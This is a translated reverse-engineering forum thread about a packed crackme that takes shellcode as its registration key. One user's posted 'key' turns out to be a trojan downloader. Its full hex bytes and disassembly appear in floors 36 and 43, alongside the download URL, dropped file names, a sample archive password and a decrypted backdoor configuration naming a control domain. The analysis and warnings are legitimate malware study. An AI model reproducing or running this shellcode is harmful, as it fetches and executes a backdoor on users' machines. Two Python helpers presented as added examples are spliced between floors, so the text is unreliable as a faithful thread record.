[Game] A strange packed crackme
Posted on: 2006-12-9 19:20 20967

Latest replies (78)

Floor 26
How come floor 25 looks like shellcode?
2006-12-12 23:31
Floor 27
Originally posted by 笨笨雄:
How come floor 25 looks like shellcode?

To find the key, think like a hacker

Paste those keys in as binary and you'll understand.
2006-12-13 01:00
Floor 28
Feels like it's simply shellcode.
2006-12-13 12:25
Floor 29
E930EFFFFFE92BEFFFFF9090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909079214000

11101001001100001110111111111111111111111110100100101011111011111111111111111111100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000
1001000010010000100100001001000010010000100100001001000010010000100100001001000001111001001000010100000000000000
Still don't get it.
2006-12-13 18:14
Floor 30
Originally posted by sbright:
E930EFFFFFE92BEFFFFF90909090909090909090909090909090909090909090909090.........................
Still don't get it.

Sweat... paste it into OD and have a look~
2006-12-13 21:09
Floor 31
Found a hole and crawled in........
Finally learned how to paste in OD.......... select a region, right-click.... Binary... Paste

.................................
But how did you experts work it out step by step...
Could you explain..........................
2006-12-13 22:33
Floor 32
Originally posted by skylly:
It's not Telock; it has a simple TLS anti-debug check and process escape.
OP, first set OD to stop at the system breakpoint, then set a breakpoint at 409040 and run.
00409040 803D 08954000 C>cmp byte ptr [<ModuleEntryPoint>], 0CC
00409047 75 0A jnz short 00409053
00409049 C705 09954000 0>mov dword ptr [409509], 5000
........

Learned something!

But TLS Data = 00409024, so it should stop at:

00409024         90              nop
00409025         90              nop
00409026         90              nop
00409027         90              nop

What follows checks whether the debugger has set a CC at the real entry point. But I still don't know what the TLS CallBack address = 00409060 location is for. I've come across TLS documentation before but never read it; brother, if you have a document, could you provide a copy?
2006-12-14 09:47
Floor 33
Originally posted by nbw:
Learned something!

But TLS Data = 00409024, so it should stop at:

00409024 90 nop
........

I don't have a document either; I never save what I've read, I just remember whatever I can.

In this EXE's TLS table, AddressOfCallBacks is 409060, meaning the address of the TLS entry is stored at 409060, and what is stored at 409060 is 409040, so the TLS entry is 409040.

I only know the surface of TLS myself; the first time I came across TLS was that program ooo made that uses TLS to pull little tricks.
Reference:
http://www.pediy.com/bbshtml/bbs7/pediy7-660.htm
2006-12-14 21:46
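The TLS walk nbw describes in floor 33 (AddressOfCallBacks at 409060, holding 409040) is exactly what a triage script does to find code the loader runs before the entry point. The Python below is an added example, not code from the thread or the crackme: it parses a PE32 image's TLS data directory, maps the AddressOfCallBacks VA through the section table and lists the callback VAs next to the entry point. The input image is constructed inline to mirror the thread's numbers (ImageBase 0x400000, TLS directory at RVA 0x9024, callback table at 0x409060, callback 0x409040, entry point 0x409508); the function names are mine.

```python
import struct

IMAGE_DIRECTORY_ENTRY_TLS = 9  # index of the TLS entry in the data directory


def _rva_to_offset(rva, sections):
    """Map an RVA to a file offset through the section table."""
    for vaddr, vsize, rptr, rsize in sections:
        if vaddr <= rva < vaddr + max(vsize, rsize):
            return rva - vaddr + rptr
    raise ValueError(f"RVA {rva:#x} is not backed by any section")


def tls_callbacks(image: bytes):
    """Walk a PE32 image's TLS directory and return its callback VAs.

    Returns None when the image has no TLS directory; otherwise a dict with the
    TLS directory RVA, the AddressOfCallBacks VA, the callback VAs read from that
    table and the entry point VA, so a report can show code that the loader
    runs before the entry point is ever reached.
    """
    if image[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad NT signature")
    nsections = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    if struct.unpack_from("<H", image, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled here")
    entry_rva = struct.unpack_from("<I", image, opt + 16)[0]
    image_base = struct.unpack_from("<I", image, opt + 28)[0]
    ndirs = struct.unpack_from("<I", image, opt + 92)[0]
    if ndirs <= IMAGE_DIRECTORY_ENTRY_TLS:
        return None
    tls_rva = struct.unpack_from("<I", image, opt + 96 + 8 * IMAGE_DIRECTORY_ENTRY_TLS)[0]
    if tls_rva == 0:
        return None
    sections = []
    hdr = opt + opt_size
    for _ in range(nsections):
        vsize, vaddr, rsize, rptr = struct.unpack_from("<IIII", image, hdr + 8)
        sections.append((vaddr, vsize, rptr, rsize))
        hdr += 40
    # IMAGE_TLS_DIRECTORY32: StartAddressOfRawData, EndAddressOfRawData,
    # AddressOfIndex, AddressOfCallBacks, SizeOfZeroFill, Characteristics
    tls_off = _rva_to_offset(tls_rva, sections)
    callbacks_va = struct.unpack_from("<I", image, tls_off + 12)[0]
    callbacks = []
    if callbacks_va:
        off = _rva_to_offset(callbacks_va - image_base, sections)
        while True:  # the table is a NULL-terminated list of VAs
            va = struct.unpack_from("<I", image, off)[0]
            if va == 0:
                break
            callbacks.append(va)
            off += 4
    return {"tls_directory_rva": tls_rva, "address_of_callbacks": callbacks_va,
            "callbacks": callbacks, "entry_point": image_base + entry_rva}


def build_sample_image(with_tls=True) -> bytes:
    """Constructed PE32 (not the crackme) laid out to mirror the thread's numbers:
    ImageBase 0x400000, TLS directory at RVA 0x9024, AddressOfCallBacks 0x409060
    whose table holds 0x409040, entry point 0x409508. Both code locations are a
    single `ret` stub."""
    image_base, sec_rva, sec_raw, sec_size = 0x400000, 0x9000, 0x200, 0x600
    tls_rva, table_va, callback_va, entry_rva = 0x9024, 0x409060, 0x409040, 0x9508
    body = bytearray(sec_size)
    struct.pack_into("<IIIIII", body, tls_rva - sec_rva, 0, 0, 0, table_va, 0, 0)
    struct.pack_into("<II", body, table_va - image_base - sec_rva, callback_va, 0)
    body[callback_va - image_base - sec_rva] = 0xC3
    body[entry_rva - sec_rva] = 0xC3
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)               # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                  # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)             # AddressOfEntryPoint
    struct.pack_into("<III", opt, 28, image_base, 0x1000, 0x200)
    struct.pack_into("<II", opt, 56, sec_rva + sec_size, sec_raw)
    struct.pack_into("<I", opt, 92, 16)                    # NumberOfRvaAndSizes
    if with_tls:
        struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_TLS, tls_rva, 24)
    sec_hdr = struct.pack("<8sIIIIIIHHI", b".tls", sec_size, sec_rva, sec_size,
                          sec_raw, 0, 0, 0, 0, 0xC0000040)
    headers = dos + b"PE\0\0" + file_hdr + opt + sec_hdr
    return bytes(headers.ljust(sec_raw, b"\0") + body)


if __name__ == "__main__":
    info = tls_callbacks(build_sample_image())
    for va in info["callbacks"]:
        print(f"TLS callback {va:#010x} runs before entry point {info['entry_point']:#010x}")
```

Run against a real sample the same function takes the file bytes directly; a non-empty `callbacks` list is the cue to set the first breakpoint at the callback rather than at the entry point, as skylly's instructions in floor 32 do.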
Floor 34
Oh, 原?狨紫呀. Still didn't remember it; I'll come and ask you again next time I run into it.
2006-12-14 22:47
Floor 35
Grabbing a spot first. I have no clue on this CM.
2006-12-16 09:23
Floor 36
The shellcode quoted by shoooo, linex and cater (everyone except heXer):
EB02EB4DE8F9FFFFFF608B6C24248B453C8B7C057801EF8B4F188B5F2001EB498B348B
01EE31C099AC84C07407C1CA0D01C2EBF43B54242875E58B5F2401EB668B0C4B8B5F1C
01EB032C8B896C241C61C331DB648B43308B400C8B701CAD8B40085E688E4E0EEC5068
AAFC0D7C50FFD68BF85A5AFFD666536A3266686C33687368656C54FFD0536A41686375
7465686C457865685368656C5450FFD753686F70656E53686B2E636E686E7061636862
732E75683A2F2F6268687474706A0353538D54240C528D5424285253FFD083C448B811
AB1040C1E80866C74001602266B8732280700190E943EEFFFF90??????????????????
??????????????????????9090909074214000


Of this, the following code can change the title:
??????????????????
??????????????????????

Code decryption:

Demo code:
EB02EB4DE8F9FFFFFF608B6C24248B453C8B7C057801EF8B4F188B5F2001EB498B348B
01EE31C099AC84C07407C1CA0D01C2EBF43B54242875E58B5F2401EB668B0C4B8B5F1C
01EB032C8B896C241C61C331DB648B43308B400C8B701CAD8B40085E688E4E0EEC5068
AAFC0D7C50FFD68BF85A5AFFD666536A3266686C33687368656C54FFD0536A41686375
7465686C457865685368656C5450FFD753686F70656E53686B2E636E686E7061636862
732E75683A2F2F6268687474706A0353538D54240C528D5424285253FFD083C448B811
AB1040C1E80866C74001602266B8732280700190E943EEFFFF90313131313131313131
31313131313131313131319090909074214000
2006-12-17 20:37
Floor 37

Can this one register too?
2006-12-20 20:58
Floor 38
I must study hard; then I'll be able to join the discussion like everyone else.
2006-12-21 19:19
Floor 39
Don't try other people's keys; it's dangerous, someone could easily slip a 灰鸽子 into your machine.
2006-12-21 21:45
Floor 40
Originally posted by heXer:
Don't try other people's keys; it's dangerous, someone could easily slip a 灰鸽子 into your machine.

Anyone who could wouldn't bother with 灰鸽...... they'd go for a rootkit....
2006-12-21 21:54
Floor 41
Originally posted by peaceclub:

Can this one register too?

It downloads http://www.h86.com.cn/test/shnokey.jpg to system32\gs.exe and then executes it.
After gs.exe runs it downloads a file called yieoxsyf.d1? into system32, hidden; it can be seen with IceSword.
It also starts your iexplore.exe and injects that yieoxsyf into it; the iexplore.exe shows no window, it's a hidden process.

What exactly this thing does I'm not sure; I simply ran it directly in a virtual machine, found these changes, then restored the snapshot.
I've packed both files in the attachment, with the filenames changed to non-exe; anyone interested can study them.
RAR archive password: 12344321
Uploaded attachment:
2006-12-21 22:33
Floor 42
Originally posted by peaceclub:

Can this one register too?

Important notice! This is a CrackMe that registers via shellcode principles; it was put here only as a game, to get a grip on some shellcode principles. The key peaceclub provided contains the character 0, so it cannot yet overflow and execute. But this code contains clearly malicious behaviour: if the code is copied into OD and executed, the program downloads shnokey.jpg to the system directory and drops files, then injects into iexplore.exe and hides the related information; see floor 41 for the analysis. And he himself gave no explanation whatsoever of the harm this code brings! The forum has always opposed trojan-planting of any kind; if something is a trojan, malicious code or virus, it must be marked with conspicuous text! I hope peaceclub will give an explanation!
2006-12-22 09:32
Floor 43
RPWT?

Made a copy.
shellcode:
004022CA                                      EB 02 EB 4D              ?胪
004022DA  E8 F9 FF FF FF 60 8B 6C 24 24 8B 45 3C 8B 7C 05  棂???$$?<?
004022EA  78 01 EF 8B 4F 18 8B 5F 20 01 EB 49 8B 34 8B 01  x?O? 肷??
004022FA  EE 31 C0 99 AC 84 C0 74 07 C1 CA 0D 01 C2 EB F4  ???吏潦.码
0040230A  3B 54 24 28 75 E5 8B 5F 24 01 EB 66 8B 0C 4B 8B  ;T$(u?_$腈?K
0040231A  5F 1C 01 EB 03 2C 8B 89 6C 24 1C 61 C3 31 DB 64  _?,?l$a?垆
0040232A  8B 43 30 8B 40 0C 8B 70 1C AD 8B 40 08 5E 68 8E  ?0?.??@^h
0040233A  4E 0E EC 50 68 AA FC 0D 7C 50 FF D6 8B F8 5A 5A  N煨h?.|P??ZZ
0040234A  FF D6 66 53 6A 32 66 68 6C 33 68 73 68 65 6C 54  ?fSj2fhl3hshelT
0040235A  FF D0 53 6A 41 68 63 75 74 65 68 6C 45 78 65 68  ?SjAhcutehlExeh
0040236A  53 68 65 6C 54 50 FF D7 53 68 6F 70 65 6E 53 68  ShelTP?ShopenSh
0040237A  2E 63 6F 6D 68 65 64 69 79 68 62 73 2E 70 68 3A  .comhediyhbs.ph:
0040238A  2F 2F 62 68 68 74 74 70 6A 03 53 53 8D 54 24 0C  //bhhttpjSS?$.
0040239A  52 8D 54 24 28 52 53 FF D0 83 C4 48 B8 11 AB 10  R?$(RS??H??
004023AA  40 C1 E8 08 66 C7 40 01 60 22 66 B8 73 22 80 70  @凌f抢`"f阁"?
004023BA  01 90 E9 43 EE FF FF 90 53 61 79 3A D2 BB D6 B1  ?C??Say:一直
004023CA  C3 BB D3 D0 B8 DF CA D6 C4 F1 CE D2 D3 D0 B8 DF  没有高手鸟我有高
004023DA  CA D6 C4 F1 CE D2 90 90 90 90 90 90 90 90 90 90  手鸟我?????
004023EA  90 90                                            ?.

004022D6   /EB 02           jmp     short 004022DA
004022D8   |EB 4D           jmp     short 00402327
004022DA   \E8 F9FFFFFF     call    004022D8
004022DF    60              pushad
004022E0    8B6C24 24       mov     ebp, dword ptr [esp+24]
004022E4    8B45 3C         mov     eax, dword ptr [ebp+3C]
004022E7    8B7C05 78       mov     edi, dword ptr [ebp+eax+78]
004022EB    01EF            add     edi, ebp
004022ED    8B4F 18         mov     ecx, dword ptr [edi+18]
004022F0    8B5F 20         mov     ebx, dword ptr [edi+20]
004022F3    01EB            add     ebx, ebp
004022F5    49              dec     ecx
004022F6    8B348B          mov     esi, dword ptr [ebx+ecx*4]
004022F9    01EE            add     esi, ebp
004022FB    31C0            xor     eax, eax
004022FD    99              cdq
004022FE    AC              lods    byte ptr [esi]
004022FF    84C0            test    al, al
00402301    74 07           je      short 0040230A
00402303    C1CA 0D         ror     edx, 0D
00402306    01C2            add     edx, eax
00402308  ^ EB F4           jmp     short 004022FE
0040230A    3B5424 28       cmp     edx, dword ptr [esp+28]
0040230E  ^ 75 E5           jnz     short 004022F5
00402310    8B5F 24         mov     ebx, dword ptr [edi+24]
00402313    01EB            add     ebx, ebp
00402315    66:8B0C4B       mov     cx, word ptr [ebx+ecx*2]
00402319    8B5F 1C         mov     ebx, dword ptr [edi+1C]
0040231C    01EB            add     ebx, ebp
0040231E    032C8B          add     ebp, dword ptr [ebx+ecx*4]
00402321    896C24 1C       mov     dword ptr [esp+1C], ebp
00402325    61              popad
00402326    C3              retn
00402327    31DB            xor     ebx, ebx
00402329    64:8B43 30      mov     eax, dword ptr fs:[ebx+30]
0040232D    8B40 0C         mov     eax, dword ptr [eax+C]
00402330    8B70 1C         mov     esi, dword ptr [eax+1C]
00402333    AD              lods    dword ptr [esi]
00402334    8B40 08         mov     eax, dword ptr [eax+8]
00402337    5E              pop     esi
00402338    68 8E4E0EEC     push    EC0E4E8E
0040233D    50              push    eax
0040233E    68 AAFC0D7C     push    7C0DFCAA
00402343    50              push    eax
00402344    FFD6            call    esi
00402346    8BF8            mov     edi, eax
00402348    5A              pop     edx
00402349    5A              pop     edx
0040234A    FFD6            call    esi
0040234C    66:53           push    bx
0040234E    6A 32           push    32
00402350    66:68 6C33      push    336C
00402354    68 7368656C     push    6C656873
00402359    54              push    esp
0040235A    FFD0            call    eax
0040235C    53              push    ebx
0040235D    6A 41           push    41
0040235F    68 63757465     push    65747563
00402364    68 6C457865     push    6578456C
00402369    68 5368656C     push    6C656853
0040236E    54              push    esp
0040236F    50              push    eax
00402370    FFD7            call    edi
00402372    53              push    ebx
00402373    68 6F70656E     push    6E65706F
00402378    53              push    ebx
00402379    68 2E636F6D     push    6D6F632E
0040237E    68 65646979     push    79696465
00402383    68 62732E70     push    702E7362
00402388    68 3A2F2F62     push    622F2F3A
0040238D    68 68747470     push    70747468
00402392    6A 03           push    3
00402394    53              push    ebx
00402395    53              push    ebx
00402396    8D5424 0C       lea     edx, dword ptr [esp+C]
0040239A    52              push    edx
0040239B    8D5424 28       lea     edx, dword ptr [esp+28]
0040239F    52              push    edx
004023A0    53              push    ebx
004023A1    FFD0            call    eax
004023A3    83C4 48         add     esp, 48
004023A6    B8 11AB1040     mov     eax, 4010AB11
004023AB    C1E8 08         shr     eax, 8
004023AE    66:C740 01 6022 mov     word ptr [eax+1], 2260
004023B4    66:B8 7322      mov     ax, 2273
004023B8    8070 01 90      xor     byte ptr [eax+1], 90
004023BC  - E9 43EEFFFF     jmp     00401204
004023C1    90              nop
004023C2    53              push    ebx
004023C3    61              popad
004023C4    79 3A           jns     short 00402400
004023C6    D2BB D6B1C3BB   sar     byte ptr [ebx+BBC3B1D6], cl
004023CC    D3D0            rcl     eax, cl
004023CE    B8 DFCAD6C4     mov     eax, C4D6CADF
004023D3    F1              int1
004023D4    CE              into
004023D5    D2D3            rcl     bl, cl
004023D7    D0B8 DFCAD6C4   sar     byte ptr [eax+C4D6CADF], 1
004023DD    F1              int1
004023DE    CE              into
004023DF    D290 90909090   rcl     byte ptr [eax+90909090], cl
004023E5    90              nop
004023E6    90              nop
004023E7    90              nop
004023E8    90              nop
004023E9    90              nop
004023EA    90              nop
004023EB    90              nop
2006-12-22 10:06
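To make the listing in floor 43 readable without executing anything, here is an added Python analysis helper (mine, not from the thread): it reimplements the name hash the loop at 004022FB..00402308 computes over export names (edx rotated right by 13, then the next byte added, until the NUL), so the two constants pushed before `call esi` (EC0E4E8E and 7C0DFCAA) can be matched back to API names from a known export list, and it rebuilds the strings the code assembles on the stack with push immediates. The export list is a constructed subset of kernel32's; the push sequences are transcribed from the listing, keyed by the address of the first push in each group.

```python
def ror13_hash(name: str) -> int:
    """The hash computed by the loop at 004022FB..00402308 over an export name:
    edx = 0; for each byte until NUL: edx = ror(edx, 13); edx += byte."""
    h = 0
    for b in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + b) & 0xFFFFFFFF
    return h


# Constructed subset of kernel32 export names. Real triage feeds the full export
# table of the module the code walks (here kernel32, located through the PEB at
# 00402329..00402334).
SAMPLE_EXPORTS = ["CreateFileA", "ExitProcess", "GetProcAddress",
                  "LoadLibraryA", "VirtualAlloc", "WinExec"]


def resolve_hashes(hashes, export_names=SAMPLE_EXPORTS):
    """Map hash constants back to export names; unknown hashes map to None."""
    table = {ror13_hash(n): n for n in export_names}
    return {h: table.get(h) for h in hashes}


def stack_string(pushes):
    """Rebuild a string assembled on the stack with push immediates.

    pushes: (immediate, bytes occupied on the stack) in execution order. The
    last push lands at the lowest address, so the bytes are joined in reverse
    order; an imm8 push such as `push 32` still occupies four bytes, a `push bx`
    or `push 336C` two."""
    raw = b"".join(v.to_bytes(n, "little") for v, n in reversed(pushes))
    return raw.split(b"\0", 1)[0].decode("ascii")


# Push sequences transcribed from the listing (push bx / push ebx push a zero
# terminator because ebx was cleared at 00402327).
PUSH_SEQUENCES = {
    "0040234C": [(0, 2), (0x32, 4), (0x336C, 2), (0x6C656873, 4)],
    "0040235C": [(0, 4), (0x41, 4), (0x65747563, 4), (0x6578456C, 4), (0x6C656853, 4)],
    "00402372": [(0, 4), (0x6E65706F, 4)],
    "00402378": [(0, 4), (0x6D6F632E, 4), (0x79696465, 4), (0x702E7362, 4),
                 (0x622F2F3A, 4), (0x70747468, 4)],
}


def decode_listing():
    """Names behind the two hashes pushed at 00402338 and 0040233E, plus the
    strings built on the stack, keyed by the address of the first push."""
    apis = resolve_hashes([0xEC0E4E8E, 0x7C0DFCAA])
    strings = {addr: stack_string(seq) for addr, seq in PUSH_SEQUENCES.items()}
    return apis, strings


if __name__ == "__main__":
    apis, strings = decode_listing()
    for h, name in apis.items():
        print(f"{h:#010x} -> {name}")
    for addr, s in strings.items():
        print(f"{addr}: {s!r}")
```

With the hashes and strings recovered, the listing reads as a plain sequence of API calls on string arguments, which is what a detection signature or a sandbox report should record rather than the raw bytes.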
Floor 44
.text:100036AE ; END OF FUNCTION CHUNK FOR DllEntryPoint
.text:100036AE ; ---------------------------------------------------------------------------
.text:100036B3 s->Goldsun      db 'Goldsun',0
.text:100036BB                 align 4
.text:100036BC                 dd 0
.text:100036C0                 db 0
.text:100036C1
.text:100036C1 ; =============== S U B R O U T I N E =======================================
.text:100036C1
.text:100036C1
.text:100036C1 ; BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpReserved)
.text:100036C1                 public DllEntryPoint
.text:100036C1 DllEntryPoint   proc near

So now.............
2006-12-22 10:46
Floor 45
I thought peaceclub was a good guy and ran his key without even thinking,
2006-12-22 11:05
Floor 46
1:
AntiVir 7.3.0.21 12.21.2006 DR/PcClient.Gen
Authentium 4.93.8 12.22.2006  no virus found
Avast 4.7.892.0 12.21.2006 Win32:Pcclient-CY
AVG 386 12.21.2006  no virus found
BitDefender 7.2 12.22.2006 Dropped:Backdoor.Pcclient.SYS
CAT-QuickHeal 8.00 12.21.2006 (Suspicious) - DNAScan
ClamAV devel-20060426 12.21.2006  no virus found
DrWeb 4.33 12.21.2006 Trojan.DownLoader.3856
eSafe 7.0.14.0 12.21.2006  no virus found
eTrust-InoculateIT 23.73.95 12.22.2006  no virus found
eTrust-Vet 30.3.3268 12.21.2006  no virus found
Ewido 4.0 12.21.2006  no virus found
Fortinet 2.82.0.0 12.21.2006  no virus found
F-Prot 3.16f 12.21.2006  no virus found
F-Prot4 4.2.1.29 12.21.2006  no virus found
Ikarus T3.1.0.27 12.21.2006  no virus found
Kaspersky 4.0.2.24 12.22.2006  no virus found
McAfee 4924 12.21.2006 BackDoor-CKB
Microsoft 1.1904 12.21.2006  no virus found
NOD32v2 1934 12.21.2006 a variant of Win32/PcClient
Norman 5.80.02 12.21.2006  no virus found
Panda 9.0.0.4 12.21.2006 Suspicious file
Prevx1 V2 12.22.2006  no virus found
Sophos 4.12.0 12.21.2006  no virus found
Sunbelt 2.2.907.0 12.18.2006 VIPRE.Suspicious
TheHacker 6.0.3.135 12.20.2006  no virus found
UNA 1.83 12.21.2006  no virus found
VBA32 3.11.1 12.21.2006 suspected of Backdoor.Hupigon.17
VirusBuster 4.3.19:9 12.21.2006 no virus found
2:
AntiVir 7.3.0.21 12.21.2006 TR/Dldr.Small.bgk
Authentium 4.93.8 12.22.2006  no virus found
Avast 4.7.892.0 12.21.2006 Win32:PcClient-EO
AVG 386 12.21.2006  no virus found
BitDefender 7.2 12.22.2006 Trojan.Downloader.Gen
CAT-QuickHeal 8.00 12.21.2006  no virus found
ClamAV devel-20060426 12.21.2006  no virus found
DrWeb 4.33 12.21.2006 Trojan.DownLoader.3856
eSafe 7.0.14.0 12.21.2006  no virus found
eTrust-InoculateIT 23.73.95 12.22.2006  no virus found
eTrust-Vet 30.3.3268 12.21.2006 Win32/Pcclient!generic
Ewido 4.0 12.21.2006 Backdoor.PcClient.cj
Fortinet 2.82.0.0 12.21.2006  no virus found
F-Prot 3.16f 12.21.2006  no virus found
F-Prot4 4.2.1.29 12.21.2006  no virus found
Ikarus T3.1.0.27 12.21.2006 Trojan-Downloader.Win32.Small.BID
Kaspersky 4.0.2.24 12.22.2006  no virus found
McAfee 4924 12.21.2006  no virus found
Microsoft 1.1904 12.21.2006  no virus found
NOD32v2 1934 12.21.2006 a variant of Win32/PcClient.IF
Norman 5.80.02 12.21.2006  no virus found
Panda 9.0.0.4 12.21.2006 Suspicious file
Prevx1 V2 12.22.2006  no virus found
Sophos 4.12.0 12.21.2006  no virus found
Sunbelt 2.2.907.0 12.18.2006  no virus found
TheHacker 6.0.3.135 12.20.2006  no virus found
UNA 1.83 12.21.2006  no virus found
VBA32 3.11.1 12.21.2006 suspected of Backdoor.PcClient.1
VirusBuster 4.3.19:9 12.21.2006 no virus found

Trojan plus downloader, and it seems there's a driver too; RP needs improving!
2006-12-22 11:25
Floor 47
Key: 10 20 17 10 09 55 11 EB
Decrypted the last 0x8B8 bytes of yieoxsyf.d1l; it's presumably the configuration.

000AEFD0  90 1F 00 00 00 26 00 00 AC 2D 00 00 83 1F 00 00  ?...&..?..?..
000AEFE0  00 00 00 00 0A 00 00 00 31 00 00 00 01 00 00 00  ........1......
000AEFF0  33 88 00 00 77 65 62 75 70 64 61 74 65 2E 33 33  3?.webupdate.33
000AF000  32 32 2E 6F 72 67 00 00 00 00 00 00 00 00 00 00  22.org..........
000AF010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF040  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF050  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF070  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF080  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF090  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF0A0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF0B0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF0C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF0D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF0E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF0F0  00 00 00 00 53 48 45 44 55 00 00 00 00 00 00 00  ....SHEDU.......
000AF100  00 00 00 00 00 00 00 00 00 00 00 00 59 69 65 6F  ............Yieo
000AF110  78 73 79 66 00 00 00 00 00 00 00 00 43 3A 5C 50  xsyf........C:\P
000AF120  72 6F 67 72 61 6D 20 46 69 6C 65 73 5C 49 6E 74  rogram Files\Int
000AF130  65 72 6E 65 74 20 45 78 70 6C 6F 72 65 72 5C 69  ernet Explorer\i
000AF140  65 78 70 6C 6F 72 65 2E 65 78 65 00 00 00 00 00  explore.exe.....
000AF150  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF160  67 6F 6C 64 73 75 6E 00 00 00 00 00 00 00 00 00  goldsun.........
000AF170  00 00 00 00 00 00 00 00 FB 4F 50 4F 7B 5B FE 47  ........?PO{[?
000AF180  82 F4 A2 7C 89 5E 37 3D 43 3A 5C 44 6F 63 75 6D  ?Ⅻ?7=C:\Docum
000AF190  65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67  ents and Setting
000AF1A0  73 5C 67 61 74 65 73 5C D7 C0 C3 E6 5C 73 68 6E  s\gates\桌面\shn
000AF1B0  6F 6B 65 79 2E 65 78 65 00 00 00 00 00 00 00 00  okey.exe........
000AF1C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF1D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF1E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF1F0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF200  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF210  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF220  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF230  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF240  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF250  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF260  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF270  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF280  00 00 00 00 00 00 00 00 43 3A 5C 57 49 4E 4E 54  ........C:\WINNT
000AF290  5C 73 79 73 74 65 6D 33 32 5C 64 72 69 76 65 72  \system32\driver
000AF2A0  73 5C 59 69 65 6F 78 73 79 66 2E 73 79 73 00 00  s\Yieoxsyf.sys..
000AF2B0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF2C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF2D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF2E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF2F0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF300  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF310  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF320  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF330  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF340  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF350  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF360  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
